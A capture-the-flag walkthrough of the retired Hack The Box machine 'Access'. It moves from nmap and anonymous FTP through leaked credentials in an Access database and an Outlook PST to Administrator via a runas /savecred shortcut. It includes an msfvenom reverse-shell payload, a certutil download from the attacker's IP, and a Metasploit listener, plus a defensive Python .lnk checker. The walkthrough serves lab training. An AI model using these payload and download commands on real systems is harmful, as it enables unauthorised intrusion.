Hackthebox.eu - Retired - Access

Recon

As always, I start with a simple up/down nmap scan of all TCP ports to see what's live:
# nmap -T4 -p- -oX /root/Desktop/HTB/Access/nmapb.xml 10.10.10.98

I then converted the output to HTML to make it pretty:

# xsltproc /root/Desktop/HTB/Access/nmapb.xml -o /root/Desktop/HTB/Access/nmapb.html

Ports 21, 23 and 80 are open. Let's do the next stage of the scan using the -A switch to fingerprint the OS and services:

# nmap -T4 -A -p21,23,80 -oX /root/Desktop/HTB/Access/nmapf.xml 10.10.10.98

Then convert that output to HTML as well.


Alright, so we have Microsoft FTP running on port 21 with anonymous access.
Port 23 is Telnet, and port 80 is IIS 7.5.

Let's browse to port 80 and see what we see.


Looks like a webcam feed of a data center.


Just a pretty simple page.

Let's see if dirb can find anything else interesting here.

http://10.10.10.98/aspnet_client/ - which returns a 403 for us right now.

What about that FTP with anonymous access?


Two folders: Backups and Engineer.

Under Backups there is a DB file, which I downloaded to my computer:

Set type to binary
Download the file

Under Engineer there is an Access Control.zip file; I downloaded that to my computer as well.


This turned out to be a password-protected ZIP file.

Exploit


Let's see what we might be able to find within these files.

I opened the mdb file using this online opener

Found this interesting table:


So we have some user/pass info here.

I tried to telnet in with all of these combinations and wasn't able to get in.
I also tried to log in to the FTP with these logins. No dice.

But wait, what about that password-protected ZIP file we found earlier?


Let's try that engineer password, since this file is the one we found under the Engineer folder on the FTP.


It worked! Now we have a PST file. A PST file is used to store emails in Microsoft Outlook, so we probably have a saved email here.

I didn't want to transfer this over to my Windows box, so I searched around for a way to open a PST file in Kali.

I found this site

# readpst -S -o /root/Desktop/HTB/Access/ /root/Desktop/HTB/Access/AccessControl.pst

This output the contents to a folder called Access Control; in that folder is a text file named 2.

Opening it up, I found an email with this in it:

Hi there,

The password for the "security" account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

Regards,

John


Alright, a new password to try.

Alright, now we have a foothold on the system.

We got the user hash with this login:

Ff1f*****************


User.txt is cool and all, but what about system access to get that root.txt?

Poking around, we found a couple of interesting folders on this box:
C:\ZKTeco>


This makes sense: the mdb file we found earlier looks like it was a DB for a door access control system.


Under the Public Desktop folder I found this .lnk file (a shortcut to a file):

type "ZKAccess3.5 Security System.lnk"



This looks like a shortcut to launch the door access control software.
Do you see what I see?


Runas ACCESS\Administrator /savecred


/savecred means the Administrator password was saved the first time the program was executed.

So we can use RUNAS to run any program we want as the Administrator account.
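
That shortcut is the whole finding, so here is an added example (not code from the original post) of how a defender could triage a host for the same misconfiguration: a small Python parser that reads the Shell Link header and StringData of a .lnk file, following the MS-SHLLINK layout, and flags any shortcut whose arguments carry /savecred. The sample shortcut bytes are constructed inline, and the program path inside them is a placeholder, since the real ZKAccess executable path is not known from the post.

```python
import struct

# LinkFlags bits from the Shell Link (.lnk) binary format (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO = 0x01, 0x02
HAS_NAME, HAS_RELPATH, HAS_WORKDIR = 0x04, 0x08, 0x10
HAS_ARGS, HAS_ICON, IS_UNICODE = 0x20, 0x40, 0x80
# StringData fields appear in this fixed order, each only if its flag is set
STRING_FIELDS = [("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON)]


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk file (command-line arguments included)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 20)[0]   # LinkFlags follows HeaderSize + CLSID
    pos = 76                                        # end of the fixed ShellLinkHeader
    if flags & HAS_IDLIST:                          # skip LinkTargetIDList (2-byte size prefix)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                        # skip LinkInfo (4-byte size includes itself)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for name, bit in STRING_FIELDS:
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        fields[name] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        pos += count * width
    return fields


def uses_saved_credentials(data: bytes) -> bool:
    """Flag shortcuts whose command line relies on runas /savecred."""
    return "/savecred" in parse_lnk(data).get("arguments", "").lower()


def build_sample_lnk(arguments: str, unicode: bool = True) -> bytes:
    """Constructed minimal .lnk for testing: header plus a single arguments field."""
    flags = HAS_ARGS | (IS_UNICODE if unicode else 0)
    clsid = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID
    header = struct.pack("<I", 0x4C) + clsid + struct.pack(
        "<IIqqqIIIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    body = arguments.encode("utf-16-le" if unicode else "cp1252")
    return header + struct.pack("<H", len(arguments)) + body
```

Pointing parse_lnk at every .lnk under C:\Users\Public\Desktop (and other shared locations) is enough to surface shortcuts that depend on a cached credential.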

Let's do it…


I used msfvenom to create badidea.exe:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.13 LPORT=4444 -f exe > badidea.exe


Started up SimpleHTTPServer in my payloads folder to serve the shell to the target box.


Set up a listener:


Use exploit/multi/handler
Options - to check the options that are required
Set payload windows/meterpreter/reverse_tcp - to match the payload I created earlier
Set lhost to my VPN IP 10.10.14.13

Run to start the listener

Now we need to get the payload onto the target box.


I know wget is not standard on a Windows box, but I still try.

I used certutil to grab the file from my attacking machine:
certutil.exe -urlcache -split -f "http://10.10.14.13:8000/badidea.exe" badidea.exe

Here is the output from my SimpleHTTPServer serving the file:


Now back to the target machine…

I first tried to run it without using runas and got this message about group policy not allowing it.


Tried it again with runas:
runas /user:Administrator /savecred "badidea.exe"


We got our shell.


Even better, we are Administrator, so now we can get our last hash.



Dropped down to a shell, cd'd to the Desktop folder and ran type against root.txt:
6e15**************